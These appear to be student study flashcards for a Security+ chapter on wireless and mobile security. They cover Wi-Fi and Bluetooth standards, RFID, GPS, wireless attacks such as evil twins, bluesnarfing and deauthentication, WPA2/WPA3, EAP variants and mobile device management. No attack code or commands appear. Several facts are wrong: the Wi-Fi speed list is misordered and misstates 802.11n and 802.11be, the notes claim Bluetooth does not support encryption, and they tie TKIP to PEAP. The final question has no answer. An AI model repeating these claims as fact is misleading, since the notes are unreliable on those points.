Security Plus - Chapter 13

Question 1

Cellular Network

Answer 1

Provide connectivity for mobile devices like cell phones by dividing geographic areas into “cells” with tower coverage allowing wireless communications between devices and towers or cell sites.
LTE (Long-term evolution), 4G, & 5G. 5G requires more densely populated antenna distribution but provides significantly more speed. Connections are provided by a cellular carrier, which is secured, managed, and controlled outside of your organization, and traffic sent via cellular connection goes through a third-party network.

Question 2

Wi-Fi Network

Answer 2

A range of wireless protocols that are used to provide wireless networking. Relies on 2.4 GHz and 5 GHz radio bands and uses multiple channels within those bands to allow multiple networks to coexist.
Standard Wi-Fi ranges (slowest to fastest):
- 802.11b - 11mbits 2.4 GHz
- 802.11n - 54 mbits 5 GHz
- 802.11g - 54 mbits 2.4 GHz
- 802.11ac - 600 mbits 5 GHz
- 802.11ax - 6.9 gbits 2.4, 5, or 6 GHz
- 802.11be - 40+ gbits 2.4, 5, or 6 GHz

Question 3

Other Wireless Network Information

Answer 3

WPA2
WPA3

Ad hoc mode - Allows devices to talk with each other directly
Infrastructure mode - Sends traffic through a base station or access point.

Service Set Identifiers (SSIDs) - Identify the wireless network name. Can be set to broadcast or private.

Question 4

Bluetooth

Answer 4

Operates on 2.4 GHz range, for low-power, short range (usually 30 - 50 meters) connections that do not have very high bandwidth needs.

Question 5

Bluetooth Security Modes

Answer 5

Security Mode 1 - No security unsecure
Security Mode 2 - Service-level enforced security
Security Mode 3 - Link-level enforced security
Security Mode 4 - Standard pairing with Security Simple Pairing

Bluetooth does not support encryption. Fixed PINs reduce the security of the connection. Susceptible to eavesdropping as well.

Question 6

Radio Frequency Identification (RFID)

Answer 6

A relatively short range (less than a foot (passive) to 100 meters (active)) wireless technology that uses a tag and receiver to exchange information.

Active has their own power source and always send signals to be read by a reader, semi-active have a battery but are activated by a reader, passive tags are always powered by a reader.

Frequency ranges:
Low - Short range, low-power for entry access and identification purposes, where they are scanned by a nearby reader.
High - Have a longer readable range up to a meter and communicate more quickly. Used for near-field communication, can support read-only, write-only and rewritable tags.
Ultra-high - The fastest to read with the longest range. Used in circumstances where readers are far away. Inventory management and antitheft purposes so a tag can be read from meters away.

Question 7

Global Positioning System (GPS)

Answer 7

Uses a constellation of satellites that send out signals which are received by a compatible GPS receiver. Can be as accurate as to identify a GPS device to within a foot of their location. This allows for highly accurate placement for geofencing, and other GPS uses. Provides a consistent time signal as well.

Attacks:
Can be jammed or spoofed

Question 8

Near-Field Communication (NFC) Not on exam

Answer 8

Short-range communication between devices, like payment terminals. Less than 4 inches of range. Attacks have to come from other devices within close proximity.

Question 9

Infrared (Not on exam)

Answer 9

Wireless technology that works in line-of-sight opportunities. Wide range of speeds. from 115 kbits to 1 gbits. Television remote controls.

Question 10

Wireless Connection Models

Answer 10

Point-to-Point - Connects two nodes, and transmissions between them can only be received by the endpoints.

Point-to-Multipoint - Connects multiple devices from a single location. Ex. Wi-Fi

Broadcast - Sends out information on many nodes and are received by many nodes. Ex. GPS and radio

Question 11

Attacks against Wireless Network and Devices

Answer 11

Evil Twin - A malicious illegitimate access point that is setup to appear to be a legitimate trusted network.

Question 11

Rogue Access Points

Answer 11

Access points that are added to your network either intentionally or unintentionally. Once connected, they offer a point of entry to attackers or other unwanted users.

Question 12

Bluetooth Attacks

Answer 12

Bluejacking - Sends unsolicited messages to Bluetooth-enabled devices.
Bluesnarfing - Unauthorized access to a Bluetooth device, typically aimed at gathering information like contact lists or other details of or on the device.
Bluetooth impersonation attacks - Take advantage of weaknesses in the Bluetooth specification, meaning that all devices that implement Bluetooth as expected are likely to be vulnerable to them. They exploit a lack of mutual authentication.

Question 13

Disassociation Attack

Answer 13

When a threat causes a device to disconnect from an access point. This causes the system to attempt to reconnect, providing the attacker with a window of opportunity to setup a more powerful evil twin or capture information as the system tries to reconnect.
Attackers may send a deauthentication frame, a specific wireless protocol element that spoofs the victim’s wireless MAC address.

Question 14

Jamming Attack

Answer 14

Blocks all traffic in the range or frequency it is conducted against.

Question 15

Sideloading

Answer 15

The process of transferring files to a mobile device, typically via a USB connection, microSD, or Bluetooth in order to install applications outside of the official app store.

Question 16

Jailbreaking

Answer 16

Takes advantage of vulnerabilities or other weaknesses in a mobile device’s operating system to conduct a privilege escalation attack and root the system. This provides a user with more access to the device than they normally have.

Question 17

Wireless Access Point Design

Answer 17

Tuning and placement of wireless access points are critical because wireless access points have a limited number of channels to operate within, and multiple wireless access points using the same channel within range of each other can decrease the performance and usability of the network. Also need to ensure the network is not extended to areas that the organization does not want the network available. Another area of design is distributing the proper channel band with space between if multiple channels are used in close proximity to each other. Network management software can be used to monitor for interference and overlap problems and adjust your network using the capabilities that determine if there are rogue access points or unknown wireless devices.

Question 18

Site Surveys

Answer 18

Involve moving throughout a facility or space to determine what existing networks are in place and to look at the physical structure for the location options for your access points. Wireless signal strength tools test strength while walking through the facility and can be used with GPS and marking ideal locations in the facility or a floorplan or map with the wireless signal spot, signal strength, and what channel or channels each access point is on.

Question 19

Heatmap

Answer 19

The floor plan map of a wireless network placement throughout a facility with the details of placement, signal strength and channels each access point are on.

Question 20

Wireless Local Area Network (WLAN)

Answer 20

Controllers that help manage access points and the organization’s wireless network. Can be deployed as hardware devices, cloud-hosted, a virtual machine, or software package.

Question 21

Securing WLAN Controllers

Answer 21

Both controllers and access points should be secured by changing default settings, disabling insecure protocols and services, setting strong passwords, protecting their administrative interfaces by placing them on isolated VLANs, and ensuring they are regularly patched and updated.

Question 22

Wi-Fi Security Standards

Answer 22

WPA2-Personal - Uses a pre-shared key and is thus often called WPA2-PSK. Allows the client to authenticate without an authentication infrastructure.

WPA2-Enterprise - Relies on a RADIUS authentication server as part of an 802.1X implementation for authentication.

WPA2 introduced the use of Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP). This uses the Advanced Encryption Standard (AES) to provide confidentiality, delivering much stronger encryption than previous protocols like Wired Equivalent Privacy (WEP). Then CCMP provides authentication for user and access control capabilities.

WPA3 - Replaces WPA2 and is required to support all Wi-Fi devices since 2020. WPA3 improvements:
- WPA3-Personal - Provides additional protection for password-based authentication, using a process known as Simultaneous Authentication of Equals (SAE). SAE replaces the pre-shared key in WPA2 and requires interaction between both the client and the network to validate both sides. Reduces brute force attack opportunities. WPA3 also implements Perfect Forward Secrecy, which ensures the traffic sent between the client and network is secure even if the client’s password has been compromised.

WPA3-Enterprise - Provides stronger encryption than WPA2 with an optional 192-bit security mode and adds authenticated encryption and additional controls for deriving and authenticating keys and encrypting frameworks.

Question 23

Perfect Forward Secrecy

Answer 23

Uses a process that changes the encryption keys in an ongoing basis so that a single exposed key won’t result in the entire communication being exposed. Keys can be reset throughout the session at set intervals or for every communication.

Question 24

Wireless Network Authentication

Answer 24

Open Networks - No authentication necessary, but often use a Captive Portal to gather some information from users who want to use them. Captive portals redirect users to a website or registration page before allowing access to a network. No encryption unless data is transmitted through a HTTPS site.

Preshared Keys (PSK) - Requires a passphrase or key that is shared with anybody who wants to use the network. Allows traffic to be encrypted but does not allow users to be identified.

Enterprise Authentication - Relies on RADIUS server and utilizes and Extensible Authentication Protocol (EAP) for authentication.

Question 25

Wireless Authentication Protocols

Answer 25

802.1X is an IEEE standard for access control of both wired and wireless devices. 802.1X integrates with RADIUS servers, allowing users to authenticate and gain access to the network. Wi-Fi Enterprise networks rely on IEEE 802.1X and various versions of EAP. EAP is used by 802.1X for the authentication process when devices are authenticating to a RADIUS server.

Question 26

Extensible Authentication Protocol (EAP)

Answer 26

Used by 802.1X protocols as part of the authentication process when devices are authenticating to a RADIUS server.
EAP Variants:
- Protected EAP (PEAP) - Authenticates servers using a certificate and wraps EAP using a TLS tunnel to keep it secure. Devices use unique encryption keys, and Temporal Key Integrity Protocol (TKIP) is implemented to replace keys on a regular basis.
- EAP-Flexible Authentication via Secure Tunneling (EAP-FAST) - A Cisco developed protocol that improved on vulnerabilities in the Lightweight Extensible Authentication Protocol (LEAP). Focused on providing faster reauthentication while devices are roaming. Works around the public key exchanges that slow down PEAP and EAP-TLS by using a symmetric shared key. EAP-FAST can use a preshared key or dynamic key using public key authentication.
- EAP-Transport Layer Security (EAP-TLS) - Implements certificate-based authentication as well as mutual authentication of the device and network. Uses certificates on both the client and network devices to generate keys that are then used for communication.
- EAP-Tunneled Transport Layer Security (EAP-TTLS) - Extends EAP-TLS but does not require the client devices to have a certificate to create a secure session. Removes the overhead management effort of EAP-TLS to distribute and manage endpoint certificates while still providing TLS support. May require additional software to be installed.

Question 27

Mobile Device Deployment Methods

Answer 27

Bring Your Own Device (BYOD) - User owns the device, user controls and maintains device. Provides more user freedom, less expense for the organization, but greater risk to the organization.

Choose Your Own Device (CYOD) - The organization owns the device, the organization controls and maintains the device. The organization owns and maintains, but allows the user to select the device they prefer.

Corporate-Owned, Personally Enabled (COPE) - The organization owns the device, the organization controls and maintains the device. The organization provides devices but allows reasonable personal use while meeting enterprise security and control needs.

Corporate-Owned (CO) = The organization owns the device, the organization controls and maintains the device. Provides the greatest control but least flexibility.

Corporate-Owned, Business-Only (COBO) - Organization owned devices used only for business purposes. Does not allow personal use at all. Devices to scan tickets at events, maintenance supervisors to track work performed or inventory counting personnel.

One way to improve security of the devices is to use Virtual Desktop Interface (VDI). Allows device users to connect to the remote environment, perform actions, and then return to normal use of their device after disconnecting from the environment. Another option is containerization services, allowing a work container and a personal container.

Question 28

Hardening Mobile Devices

Answer 28

The Center for Internet Security (CIS) provides benchmarks for hardening mobile devices. CIS offers benchmarks for both iOS and Android. Hardening techniques include:
- Updating and patching the OS
- Enabling remote wipe functionality
- Requiring passcodes
- Setting automatic screen locks
- Wiping the device after successive passcode failure attempts
- Turning off connectivity options like Bluetooth when not in use

Question 29

Mobile Device Management (MDM)

Answer 29

Also known as Unified Endpoint Managment (UEM). MDM tools target devices like Android and iOS phones, tablets, and similar devices. UEM tools combine both mobile devices and desktops and laptops, and many other types of devices in a single management platform. Another tool that can be used to manage mobile devices is a Mobile Application Management (MAM) tool for maintaining the applications that are permitted on a mobile device. Features of an MDM, UEM, or MAM in an organization:
- Application management features that can deploy specific applications, limit what applications can be installed, remote adding, removing, or changing applications and settings on the devices, and monitoring application usage.
- Content management ensures that secure access and control of the organizational files on the device. This is a concern for BYOD devices to be able to separate the organization data from personal data on a device.
- Remote wipe capabilities are used when a device is lost, stolen, or when the owner of the device is no longer employed by the organization. Understand the difference between full device wipe and wiping only the organizational data and applications from the device.
- Geolocation and geofencing capabilities allow you to use the location of the phone to make decisions about its operation. Ex. Only allow a corporate tablet to be used within their facilities.
- Screen locks, passwords, and PINs are used to prevent unauthorized access.
- Biometrics are usually adopted for additional security as well as ease if use.
- Context-aware authentication reflects user behavior like hours of use, GPS location, etc.
- Containerization separates work areas for hosting data on a device versus the personal area on the device. Using a secure container for the work applications and data reduces the risk of cross-contamination and exposure.
- Storage segmentation also ensures that organization data remains segregated from personal data on the device
- Full-device encryption remains the best way to ensure that a stolen or lost device will not result in a data breach.
- Push notifications enabled to be able to send an urgent communication or alert to a user to be aware of an issue or need to perform an action.

MDM/UEMs also have the ability to provide user controls around monitoring of firmware, updates, and ensuring that patching and updating is occurring. They also have the ability to limit what Wi-Fi networks a device is permitted to connect to or the location the device can be used at.

Question 30

Captive Portal